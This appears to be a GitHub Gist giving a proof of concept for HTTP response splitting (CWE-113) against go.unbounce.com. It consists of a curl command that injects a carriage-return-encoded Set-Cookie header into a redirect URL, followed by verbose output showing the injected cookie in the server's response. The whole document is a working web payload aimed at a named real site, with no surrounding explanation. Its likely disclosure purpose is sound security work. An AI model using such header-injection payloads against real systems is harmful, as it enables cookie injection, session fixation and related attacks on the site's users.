Last active
October 13, 2017 17:16
-
-
Save cedriczirtacic/6ba8bef86521c73d8040 to your computer and use it in GitHub Desktop.
Unbounce.com HTTP Response Splitting (CWE-113)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [cicatriz@localhost ~]$ curl -v 'http://go.unbounce.com/pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2=' -H 'Host: go.unbound.com' -H 'Accept: */*' | |
| * About to connect() to go.unbounce.com port 80 (#0) | |
| * Trying 54.225.243.45... | |
| * connected | |
| * Connected to go.unbounce.com (54.225.243.45) port 80 (#0) | |
| > GET /pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2= HTTP/1.1 | |
| > User-Agent: curl/7.27.0 | |
| > Host: go.unbound.com | |
| > Accept: */* | |
| > | |
| < HTTP/1.1 301 Moved Permanently | |
| < Content-Type: text/html; charset=iso-8859-1 | |
| < Date: Wed, 02 Apr 2014 03:12:14 GMT | |
| Set-Cookie: xxx=test; path=/; xxx2=/icing/clkn/http/ | |
| < Server: Apache | |
| < Vary: Accept-Encoding | |
| < Content-Length: 349 | |
| < Connection: keep-alive | |
| < | |
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | |
| <html><head> | |
| <title>301 Moved Permanently</title> | |
| </head><body> | |
| <h1>Moved Permanently</h1> | |
| Set-Cookie: xxx=test; path=/; xxx2=/">here</a>.</p>d.com/pricing/clkn/http/ | |
| <hr> | |
| <address>Apache Server at go.unbound.com Port 80</address> | |
| </body></html> | |
| * Connection #0 to host go.unbounce.com left intact | |
| * Closing connection #0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment